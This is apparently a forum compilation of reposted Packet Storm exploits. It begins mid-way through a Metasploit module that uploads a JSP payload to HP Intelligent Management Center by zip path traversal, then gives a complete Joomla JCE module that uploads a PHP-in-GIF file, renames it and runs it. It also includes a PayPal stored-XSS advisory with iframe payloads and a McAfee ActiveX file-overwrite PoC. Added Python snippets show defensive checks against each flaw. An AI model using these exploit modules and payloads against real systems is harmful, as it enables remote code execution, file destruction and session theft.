    @peer = "#{rhost}:#{rport}"
    # New lines are handled on the vuln app and payload is corrupted
    jsp = payload.encoded.gsub(/\x0d\x0a/, "").gsub(/\x0a/, "")
    jsp_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp"
    # Zipping with CM_STORE to avoid errors while zip decompressing
    # on the Java vulnerable application
    zip = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
    zip.add_file("../../../../../../../ROOT/#{jsp_name}", jsp)
    post_data = Rex::MIME::Message.new
    post_data.add_part(zip.pack, "application/octet-stream", nil, "form-data; name=\"#{Rex::Text.rand_text_alpha(4+rand(4))}\"; filename=\"#{Rex::Text.rand_text_alpha(4+rand(4))}.zip\"")
    # Work around an incompatible MIME implementation
    data = post_data.to_s
    data.gsub!(/\r\n\r\n--_Part/, "\r\n--_Part")
    print_status("#{@peer} - Uploading the JSP payload...")
    res = send_request_cgi({
      'uri'    => normalize_uri(target_uri.path.to_s, "webdm", "mibbrowser", "mibFileUpload"),
      'method' => 'POST',
      'data'   => data,
      'ctype'  => "multipart/form-data; boundary=#{post_data.bound}",
      'cookie' => "JSESSIONID=#{Rex::Text.rand_text_hex(32)}"
    })
    if res and res.code == 200 and res.body.empty?
      print_status("#{@peer} - JSP payload uploaded successfully")
      register_files_for_cleanup(jsp_name)
    else
      fail_with(Exploit::Failure::Unknown, "#{@peer} - JSP payload upload failed")
    end
    print_status("#{@peer} - Executing payload...")
    send_request_cgi({
      'uri'    => normalize_uri(jsp_name),
      'method' => 'GET'
    })
  end
end

Sursa: HP Intelligent Management Center Arbitrary File Upload ≈ Packet Storm
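The weakness the module relies on is the zip handler writing an entry named `../../../../../../../ROOT/<name>.jsp` wherever the name points. The following extractor is an added example (not HP's code or the module's) of the check that closes that hole: every entry is resolved against the destination directory before anything is written. The sample archive is constructed in memory, stored uncompressed like the module's CM_STORE archive, and its entry names are placeholders.

```python
"""Reject zip entries that would escape the extraction directory.

Added example, not HP IMC or Metasploit code. A safe extractor resolves
every entry name against the destination and refuses anything that lands
outside it, which is exactly what the mibFileUpload handler failed to do.
"""
import io
import os
import tempfile
import zipfile


def unsafe_entries(zip_bytes, dest_dir):
    """Return the entry names in the archive that would land outside dest_dir."""
    dest = os.path.realpath(dest_dir)
    bad = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            # Treat backslashes as separators too, as a Windows JVM would
            candidate = os.path.realpath(os.path.join(dest, name.replace("\\", "/")))
            try:
                inside = os.path.commonpath([dest, candidate]) == dest
            except ValueError:  # different drive on Windows: certainly outside
                inside = False
            if not inside:
                bad.append(name)
    return bad


def extract_safely(zip_bytes, dest_dir):
    """Extract only the entries that stay inside dest_dir; return what was written."""
    rejected = set(unsafe_entries(zip_bytes, dest_dir))
    written = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.filename in rejected or info.is_dir():
                continue
            target = os.path.join(dest_dir, info.filename)
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with zf.open(info) as src, open(target, "wb") as dst:
                dst.write(src.read())
            written.append(info.filename)
    return written


def build_sample_zip():
    """Constructed sample archive: one benign MIB file and one traversal entry."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("mibs/EXAMPLE-MIB.txt", "EXAMPLE-MIB DEFINITIONS ::= BEGIN END")
        zf.writestr("../../../../../../../ROOT/shell.jsp", "<% /* constructed placeholder */ %>")
    return buf.getvalue()


def demo():
    """Run the sample archive through both functions in a scratch directory."""
    data = build_sample_zip()
    with tempfile.TemporaryDirectory() as scratch:
        flagged = unsafe_entries(data, scratch)
        written = extract_safely(data, scratch)
        landed = os.path.exists(os.path.join(scratch, "mibs", "EXAMPLE-MIB.txt"))
    return flagged, written, landed


if __name__ == "__main__":
    print(demo())
```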
13. Joomla Component JCE File Upload Remote Code Execution

This Metasploit module exploits a vulnerability in the JCE component for Joomla!, which could allow an unauthenticated remote attacker to upload arbitrary files, caused by the failure to sufficiently sanitize user-supplied input. By sending a specially-crafted HTTP request, a remote attacker could exploit this vulnerability to upload a malicious PHP script, which could allow the attacker to execute arbitrary PHP code on the vulnerable system. This Metasploit module has been tested successfully on the JCE Editor 1.5.71 and Joomla 1.5.26.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Joomla Component JCE File Upload Remote Code Execution',
      'Description'    => %q{
        This module exploits a vulnerability in the JCE component for Joomla!,
        which could allow an unauthenticated remote attacker to upload arbitrary
        files, caused by the failure to sufficiently sanitize user-supplied input.
        By sending a specially-crafted HTTP request, a remote attacker could exploit
        this vulnerability to upload a malicious PHP script, which could allow the
        attacker to execute arbitrary PHP code on the vulnerable system. This module
        has been tested successfully on the JCE Editor 1.5.71 and Joomla 1.5.26.
      },
      'Author'         =>
        [
          'Unknown', # From AmnPardaz Security Group
                     # Vulnerability discovery and PoC
          'Heyder Andrade <eu[at]heyderandrade.org>' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['BID', '49338'],
          ['EDB', '17734']
        ],
      'Payload'        =>
        {
          'Space'       => 4000, # only to prevent error HTTP 414 (Request-URI Too Long)
          'DisableNops' => true,
          'BadChars'    => "#",
          'Keys'        => ['php']
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [[ 'Automatic', { }]],
      'Privileged'     => false,
      'DisclosureDate' => 'Aug 2 2012',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, "Joomla directory path", "/"])
      ], self.class)
  end

  def get_version
    # check imgmanager version
    @uri_base = normalize_uri(target_uri.path.to_s, 'index.php')
    @vars_get_base = {
      'option' => 'com_jce',
      'task'   => 'plugin',
      'plugin' => 'imgmanager',
      'file'   => 'imgmanager'
    }
    print_status("Checking component version to #{datastore['RHOST']}:#{datastore['RPORT']}")
    res = send_request_cgi({
      'uri'      => @uri_base,
      'vars_get' => @vars_get_base,
      'method'   => 'GET',
      'version'  => '1.1'
    })
    version = nil
    if (res and res.code == 200)
      res.body.match(%r{^\s+?<title>Image\sManager\s:\s?(.*)<})
      version = $1.nil? ? nil : $1
    end
    return version
  end

  def check
    version = ( get_version || '').to_s
    if (version.match(%r{1\.5\.7\.1[0-4]?}))
      return Exploit::CheckCode::Vulnerable
    end
    return Exploit::CheckCode::Safe
  end

  def upload_gif
    # add GIF header
    cmd_php = "GIF89aG\n<?php #{payload.encoded} ?>"
    # Generate some random strings
    @payload_name = rand_text_alpha_lower(6)
    boundary = '-' * 27 + rand_text_numeric(11)
    parms = {'method'=> 'form'}
    parms.merge!(@vars_get_base)
    # POST data
    post_data = Rex::MIME::Message.new
    post_data.bound = boundary
    post_data.add_part("/", nil, nil, "form-data; name=\"upload-dir\"")
    post_data.add_part("", "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"\"")
    post_data.add_part("0", nil, nil, "form-data; name=\"upload-overwrite\"")
    post_data.add_part("#{cmd_php}", "image/gif", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}.gif\"")
    post_data.add_part("#{@payload_name}", nil, nil, "form-data; name=\"upload-name\"")
    post_data.add_part("upload", nil, nil, "form-data; name=\"action\"")
    data = post_data.to_s
    res = send_request_cgi({
      'uri'      => @uri_base,
      'vars_get' => parms,
      'method'   => 'POST',
      'version'  => '1.1',
      'data'     => data,
      'ctype'    => "multipart/form-data; boundary=#{post_data.bound}"
    })
    # note: the original used a single '=' here, which assigned rather than compared
    if (res and res.code == 200)
      return :access_denied if (res.body =~ /RESTRICTED/i)
      print_good("Successfully uploaded #{@payload_name}.gif")
    else
      print_error("Error uploading #{@payload_name}.gif")
      return :abort
    end
    return :success
  end

  def renamed?
    # Rename the file from .gif to .php
    data = "json={\"fn\":\"folderRename\",\"args\":[\"/#{@payload_name}.gif\",\"#{@payload_name}.php\"]}"
    print_status("Change Extension from #{@payload_name}.gif to #{@payload_name}.php")
    res = send_request_cgi(
      {
        'uri'      => @uri_base,
        'vars_get' => @vars_get_base,
        'method'   => 'POST',
        'version'  => '1.1',
        'data'     => data,
        'ctype'    => 'application/x-www-form-urlencoded; charset=utf-8',
        'headers'  => {
          'X-Request' => 'JSON'
        }
      })
    if (res and res.code == 200 )
      print_good("Renamed #{@payload_name}.gif to #{@payload_name}.php")
      return true
    else
      print_error("Failed to rename #{@payload_name}.gif to #{@payload_name}.php")
      return false
    end
  end

  def call_payload
    payload = "#{@payload_name}.php"
    print_status("Calling payload: #{payload}")
    uri = normalize_uri(target_uri.path.to_s, "images", "stories", payload)
    res = send_request_cgi({
      'uri'     => uri,
      'method'  => 'GET',
      'version' => '1.1'
    })
  end

  def exploit
    return if not check == Exploit::CheckCode::Vulnerable
    if upload_gif == :success
      if renamed?
        register_files_for_cleanup("#{@payload_name}.php")
        call_payload
      end
    end
  end
end

Sursa: Joomla Component JCE File Upload Remote Code Execution ≈ Packet Storm
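The chain above needs two things from the image manager: accepting a file whose body is a GIF header followed by PHP, and then letting folderRename turn .gif into .php. The following validation is an added example (not JCE or Joomla code) of the two checks an upload handler should apply; the helper names and the constructed sample inputs are this example's own.

```python
"""Upload and rename checks of the kind that break the JCE .gif-to-.php chain.

Added example, not JCE or Joomla code. check_upload() refuses polyglot
images (valid magic bytes with PHP after them) and check_rename() refuses
renames that turn a data file into something the web server executes.
"""
import os
import re

# Allowed upload extensions and the magic bytes each must start with
IMAGE_MAGIC = {
    ".gif":  (b"GIF87a", b"GIF89a"),
    ".png":  (b"\x89PNG\r\n\x1a\n",),
    ".jpg":  (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
}
# Extensions the web server would execute rather than serve as data
EXECUTABLE_EXT = {".php", ".phtml", ".php3", ".php4", ".php5", ".phar", ".cgi"}
# PHP open tags and script tags; plain '<?' is not matched because JPEG/PNG
# XMP metadata legitimately contains '<?xpacket'
EMBEDDED_CODE = re.compile(rb"<\?php\b|<\?=|<script\b", re.IGNORECASE)


def check_upload(filename, content):
    """Return None if the upload is acceptable, otherwise a reason string."""
    ext = os.path.splitext(filename)[1].lower()
    if ext not in IMAGE_MAGIC:
        return f"extension {ext or '(none)'} is not an allowed image type"
    if not content.startswith(IMAGE_MAGIC[ext]):
        return "content does not match the magic bytes for " + ext
    # A correct header is not enough: a polyglot carries code after it
    if EMBEDDED_CODE.search(content):
        return "image contains embedded script tags"
    return None


def check_rename(old_name, new_name):
    """A rename may not move the file or change it into an executable type."""
    if "/" in new_name or "\\" in new_name or ".." in new_name:
        return "new name must be a bare file name"
    old_ext = os.path.splitext(old_name)[1].lower()
    new_ext = os.path.splitext(new_name)[1].lower()
    if new_ext in EXECUTABLE_EXT:
        return f"refusing to rename to executable extension {new_ext}"
    if new_ext != old_ext:
        return f"extension change {old_ext} -> {new_ext} not allowed"
    return None


if __name__ == "__main__":
    # Constructed inputs shaped like the module's upload and rename steps
    print(check_upload("abcdef.gif", b"GIF89aG\n<?php /* constructed */ ?>"))
    print(check_rename("abcdef.gif", "abcdef.php"))
```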
14. Title:
======
Paypal Bug Bounty #6 - Persistent Web Vulnerability

Date:
=====
2013-03-27

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=645

PayPal Security UID: ydh14ayfu

VL-ID:
=====
645

Common Vulnerability Scoring System:
====================================
3.5

Introduction:
=============
PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money transfers serve as electronic alternatives to paying with traditional paper methods, such as checks and money orders. Originally, a PayPal account could be funded with an electronic debit from a bank account or by a credit card at the payer's choice. But some time in 2010 or early 2011, PayPal began to require a verified bank account after the account holder exceeded a predetermined spending limit. After that point, PayPal will attempt to take funds for a purchase from funding sources according to a specified funding hierarchy. If you set one of the funding sources as Primary, it will default to that, within that level of the hierarchy (for example, if your credit card ending in 4567 is set as the Primary over 1234, it will still attempt to pay money out of your PayPal balance, before it attempts to charge your credit card). The funding hierarchy is a balance in the PayPal account; a PayPal credit account, PayPal Extras, PayPal SmartConnect, PayPal Extras Master Card or Bill Me Later (if selected as primary funding source) (It can bypass the Balance); a verified bank account; other funding sources, such as non-PayPal credit cards. The recipient of a PayPal transfer can either request a check from PayPal, establish their own PayPal deposit account or request a transfer to their bank account. PayPal is an acquirer, performing payment processing for online vendors, auction sites, and other commercial users, for which it charges a fee. It may also charge a fee for receiving money, proportional to the amount received.

The fees depend on the currency used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient's account type. In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies.

On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its corporate headquarters are in San Jose, California, United States at eBay's North First Street satellite office campus. The company also has significant operations in Omaha, Nebraska, Scottsdale, Arizona, and Austin, Texas, in the United States, Chennai, Dublin, Kleinmachnow (near Berlin) and Tel Aviv. As of July 2007, across Europe, PayPal also operates as a Luxembourg-based bank. On March 17, 2010, PayPal entered into an agreement with China UnionPay (CUP), China's bankcard association, to allow Chinese consumers to use PayPal to shop online. PayPal is planning to expand its workforce in Asia to 2,000 by the end of the year 2010. Between December 4–9, 2010, PayPal services were attacked in a series of denial-of-service attacks organized by Anonymous in retaliation for PayPal's decision to freeze the account of WikiLeaks citing terms of use violations over the publication of leaked US diplomatic cables.

(Copy of the Homepage: www.paypal.com)

[http://en.wikipedia.org/wiki/PayPal]

Abstract:
=========
The Vulnerability Laboratory Research Team discovered a Web Vulnerability in the official Paypal plaze ecommerce website application.
Report-Timeline:
================
2012-07-01: Researcher Notification & Coordination
2012-07-02: Vendor Notification
2012-08-13: Vendor Response/Feedback
2012-03-26: Vendor Fix/Patch
2012-03-27: Public Disclosure

Status:
========
Published

Affected Products:
==================
PayPal Inc
Product: Core Application 2012 Q4

Exploitation-Technique:
=======================
Remote

Severity:
=========
Medium

Details:
========
A persistent input validation vulnerability is detected in the official Paypal ecommerce website content management system for sellers. The bug allows remote attackers to implement/inject their own malicious script code on the application side (persistent) of the paypal web service. The persistent vulnerability is located in the Seller Invoice module, in the bound vulnerable 'sent an invoice', 'your invoice', 'subject', 'sent to' & 'invoice number' parameters. The vulnerability can be exploited by remote attackers with low required user interaction and a privileged seller account. Successful exploitation of the vulnerability can lead to session hijacking (admin), account theft via persistent web attack or stable (persistent) context manipulation.

Vulnerable Section(s):
[+] Seller

Vulnerable Module(s):
[+] Invoice - Listing

Vulnerable Parameter(s):
[+] sent an invoice
[+] your invoice
[+] subject
[+] sent to
[+] invoice number field

Proof of Concept:
=================
The vulnerability can be exploited by remote attackers with a Business (Seller) Account & low required user interaction. For demonstration or to reproduce ...

1. To reproduce the vulnerability, the remote attacker (seller) creates an invoice by going to [Request Money] -> Create invoice
2. He injects his own malicious script code, like JS or HTML, into the input fields 'sent an invoice', 'your invoice', 'subject', 'sent to' & 'invoice number'
3. In the Send to field, the attacker can choose the mails of users on PayPal to send them the malicious invoice directly
4. When the user checks his inbox, the malicious script code (HTML/JS) gets executed [persistent] out of the listing web context

Review:
<tr>
<td>Subject: </td><td> You sent an invoice (``>``<iframe src=``devscr-Dateien/a.x`` to<=`` td=``>
</tr>
</table>
<div id=``email_body`` style=``height:300px``>
<textarea style=``border:0; width:98%; height:300px; overflow:visible`` readonly=``readonly``>
----NextPart_048F8BC8A2197DE2036A
Content-Transfer-Encoding: quoted-printable
Content-Type: text/plain; charset=windows-1252

----------------------------------------------------------------------
You sent an invoice
----------------------------------------------------------------------

Hello =22>=22<iframe src=3Dhttp://www.vuln-lab.com></iframe>,

Your invoice (=22>=22<iframe src=``devscr-Dateien/www.htm`` was=`` just=`` sent=`` to=``">"< iframe`` ==`` please=`` note=`` that=`` it=`` may=`` take=`` a=`` few=`` moments=`` for=`` this=`` transaction=`` appear=``in`` your=`` account.=`` see=`` invoice:=``https://www.sandbox.paypal.com/us/cgi-bin/?cmd=3D_inv-details &id=3DINV2-6G2=`` h-qwaa-ajup-rhnv=``
------------------------------------------------------------- ---------=`` ">"<iframe=``src=3Dhttp://www.vuln-lab.com></iframe>=22``>=22<iframe =
src=3Dhttp://www.vuln-lab.com></iframe>
=22>=22<iframe src=``devscr-Dateien/www_003.htm``></iframe>

----------------------------------------------------------------------
Summary of your invoice
----------------------------------------------------------------------

Sent to: ``>``<iframe =
src=3Dhttp://www.vuln-lab.com></iframe> test=40test.com
Sent from: =22>=22<iframe src=``devscr-Dateien/www_003.htm``></iframe> the_st_1341106590_biz=40mail.com
Invoice number: =22>=22<iframe src=``devscr-Dateien/www_004.htm`` date=`` payment=`` is=`` due:=`` jun=`` 30,=`` 2012= `` amount:=``244.00`` usd=`` see=`` the=`` invoice=`` as=`` your=`` recipient=`` sees=`` it=`` :=`` https://www.sandbox.paypal.com/us/cgi-bin/?cmd=3D_pay-inv&id=3DINV2-6G2H-QW=`` aa-ajup-rhnv=``20` `
----------------------------------------------------------------------=`` help=`` center:=``20`` https:=`` www.sandbox.paypal.com=`` `` us=`` cgi-bin=`` helpweb?cmd=``3D_help`` security=`` please=`` don't=`` reply=`` to=`` this=`` email.=`` it'll=`` `` just=`` confuse=`` computer=`` that=``sent`` and=`` you=`` won't=`` get=`` a=`` response.=`` `` copyright=``A9`` paypal,=`` inc.=`` all=`` rights=`` reserved.=`` paypal=`` located=`` at=``2211`` n.=`` `` first=`` st.,=`` san=`` jose,=`` ca=`` 95131.=``20`` email=`` id=`` pp1558=``
----nextpart_048f8bc8a2197de2036a=`` ``
content-transfer-encoding:=`` quoted-printable=``
content-type:=`` text=`` html;=`` charset=``windows-1252``
<html=``><head title=3D=22PayPal=22/><body><div class=3D=22ppmail=22><style =
type=3D=22text/css=22>=23emailWrapperTable h1, =23emailWrapperTable h2 =
=7Bfont-family:Verdana,Arial;margin-bottom:2px; font-size:15px;=7D =23emailWrapperTable h3 =7Bfont-size:13px;=7D =23emailWrapperTable h4 =7Bfont-size:11px;=7D a =7Bcolor:=23084482; text-decoration:underline;=7D hr =7Bdisplay: none;=7D =2Esmall =7Bfont-size:10px;=7D =2Eppid =7Bcolor:=23757575;=7D p =7Bmargin:11px 0; padding:0;=7D </style>
<=21--=5Bif gte mso 9=5D><style>.outlookFix =7Bfont-size:11px =
=21important;=7D</style><=21=5Bendif=5D-->
<table border=3D=220=22 cellpadding=3D=220=22 cellspacing=3D=220=22 =
id=3D=22emailWrapperTable=22 style=3D=22font:11px Verdana, Arial, =
Helvetica, sans-serif;color:=23333;=22 width=3D=22580=22><tr =
valign=3D=22top=22><td colspan=3D=223=22><table border=3D=220=22 =
cellpadding=3D=220=22 cellspacing=3D=220=22 width=3D=22100%=22 =
style=3D=22margin-bottom:10px;=22><tr valign=3D=22bottom=22><td =
align=3D=22left=22 width=3D=22253=22><span> </span></td><td =
align=3D=22right=22 style=3D=22padding:0 4px 4px 0;=22><span =
style=3D=22font:12px arial;font-style: italic;color: =23757575;=22>Powered =
by</span></td><td align=3D=22left=22 width=3D=2289=22 =
style=3D=22padding-right:13px;=22><img align=3D=22center=22 =
height=3D=2220=22 =
src=3D=22http://www.sandbox.paypal.com/en_US/i/logo/logo_paypal_76w_20h.gif=
=22 border=3D=220=22 =
alt=3D=22PayPal=22/></td></tr><tr><td/> </tr></table></td></tr><tr><td =
colspan=3D=223=22><img height=3D=2213=22 =
src=3D=22http://www.sandbox.paypal.com/en_US/i/scr/scr_emailTopCorners_580w=
x13h.gif=22 border=3D=220=22 style=3D=22vertical-align:bottom=22 =
alt=3D=22=22/></td></tr><tr><td width=3D=2212=22 =
style=3D=22background:url(/i/scr/scr_emailLeftBorder_13wx1h.gif) left =
repeat-y;border-left: 1px solid =23ddd;=22><i

Risk:
=====
The security risk of the persistent script code injection web vulnerability is estimated as medium(+).

Credits:
========
Vulnerability Laboratory [Research Team] - Ibrahim M. El-Sayed [the_storm] (storm@vulnerability-lab.com)

Source: PayPal Sellers CMS Cross Site Scripting - Packet Storm
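The Review section of the advisory above is the raw, quoted-printable encoded email in which the injected markup travelled, which makes the payload hard to read. The following is an added example, not part of the advisory or of PayPal's code: it decodes a fragment in that encoding to show the markup as the browser saw it, and puts a listing renderer that concatenates seller-controlled fields next to one that HTML-escapes them. The field names, the render functions and the sample fragment are assumptions constructed for the example, modelled on the PoC.

```python
# Added example: decode the advisory's quoted-printable evidence and compare
# an unescaped invoice listing with an escaped one. Not from the advisory;
# field names and renderers are assumptions.
import html
import quopri

# Constructed fragment in the same encoding as the advisory's Review
# section: =22 is a double quote and =3D is an equals sign.
QP_FRAGMENT = b"Hello =22>=22<iframe src=3Dhttp://www.vuln-lab.com></iframe>,"

# Seller-controlled invoice fields, with the payload shape used in the PoC.
INJECTED = '"><iframe src=http://www.vuln-lab.com></iframe>'
INVOICE = {
    "Subject": "You sent an invoice " + INJECTED,
    "Sent to": INJECTED + " test@test.com",
    "Invoice number": INJECTED,
}


def decode_qp(fragment: bytes) -> str:
    """Undo the quoted-printable transfer encoding of the email body."""
    return quopri.decodestring(fragment).decode("windows-1252")


def render_unsafe(fields: dict) -> str:
    """Vulnerable pattern: values are concatenated into the HTML listing
    exactly as the seller typed them."""
    rows = "".join(f"<tr><td>{k}: </td><td>{v}</td></tr>" for k, v in fields.items())
    return f"<table>{rows}</table>"


def render_safe(fields: dict) -> str:
    """Hardened: every value is escaped for the HTML text/attribute context it
    lands in, so '<', '>', '&' and quotes can no longer close or open a tag."""
    rows = "".join(
        f"<tr><td>{html.escape(k)}: </td><td>{html.escape(v, quote=True)}</td></tr>"
        for k, v in fields.items()
    )
    return f"<table>{rows}</table>"


def has_live_markup(rendered: str) -> bool:
    """Rough check used here to compare the two renderers: does a real
    <iframe or <script tag survive into the output?"""
    low = rendered.lower()
    return "<iframe" in low or "<script" in low


if __name__ == "__main__":
    print(decode_qp(QP_FRAGMENT))                   # Hello ">"<iframe src=http://www.vuln-lab.com></iframe>,
    print(has_live_markup(render_unsafe(INVOICE)))  # True
    print(has_live_markup(render_safe(INVOICE)))    # False
```

Note the leading `">` in the payload: in the advisory's dump the injected value sometimes lands inside an attribute (`src=``devscr-Dateien/a.x`` to<=`` td=``>`), so the quote is what breaks out of the attribute before the iframe opens. That is why the escape is done with `quote=True`; escaping only angle brackets would leave the attribute context exploitable.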
15. McAfee Virtual Technician (MVT) 6.5.0.2101 - Insecure ActiveX Method

Advisory ID: HTB23128
Product: McAfee Virtual Technician (MVT) 6.5.0.2101
Vendor: McAfee
Vulnerable Version(s): 6.5.0.2101 and probably prior
Tested Version: 6.5.0.2101 on Windows 7 SP1 and Internet Explorer 9
Vendor Notification: November 19, 2012
Vendor Patch: March 15, 2013
Public Disclosure: March 27, 2013
Vulnerability Type: Exposed Unsafe ActiveX Method [CWE-618]
CVE Reference: CVE-2012-5879
Risk Level: Medium
CVSSv2 Base Score: 5.8 (AV:N/AC:M/Au:N/C:N/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered a vulnerability in the McAfee Virtual Technician ActiveX control, which can be exploited by a remote malicious person to overwrite arbitrary files with garbage data on a vulnerable system.

1) Insecure method in McAfee Virtual Technician ActiveX control: CVE-2012-5879

The vulnerability exists due to the ActiveX control exposing the insecure "Save()" method in the "McHealthCheck.dll" DLL. This can be exploited to corrupt or create arbitrary files in the context of the current user.

The following PoC code is available:

<html>
<h4>McAfee Virtual Technician [McHealthCheck.dll] v.6.5.0.2101</h4>
<h5>This proof of concept creates an arbitrary file on a system [Windows 7, SP1 with IE 9.0] by leveraging the McHealthCheck.dll ActiveX module and the method "Save()":</h5>
<object classid='clsid:24565A99-ADDA-47B9-9E86-3C4C3360E256' id='target'></object>
<input type="button" value="Boom!" language="VBScript" OnClick="CreateArbitraryFile()">
<script language="VBScript">
sub CreateArbitraryFile()
  arg1="FilePath\File_name_to_corrupt_or_create"
  target.Save arg1
End Sub
</script>
</html>

Solution:

Upgrade to McAfee Virtual Technician (MVT) 7.1

More Information:
https://kc.mcafee.com/corporate/index?page=content&id=SB10040

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23128 - https://www.htbridge.com/advisory/HTB23128 - McAfee Virtual Technician ActiveX control Insecure Method.
[2] McAfee Virtual Technician - mvt.mcafee.com - McAfee Virtual Technician collects information on your computer system so that McAfee can diagnose and solve problems related to your McAfee software.
[3] Common Vulnerabilities and Exposures (CVE) - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - targeted to developers and security practitioners, CWE is a formal list of software weakness types.

-----------------------------------------------------------------------------------------------

Source: McAfee Virtual Technician (MVT) 6.5.0.2101 - Insecure ActiveX Method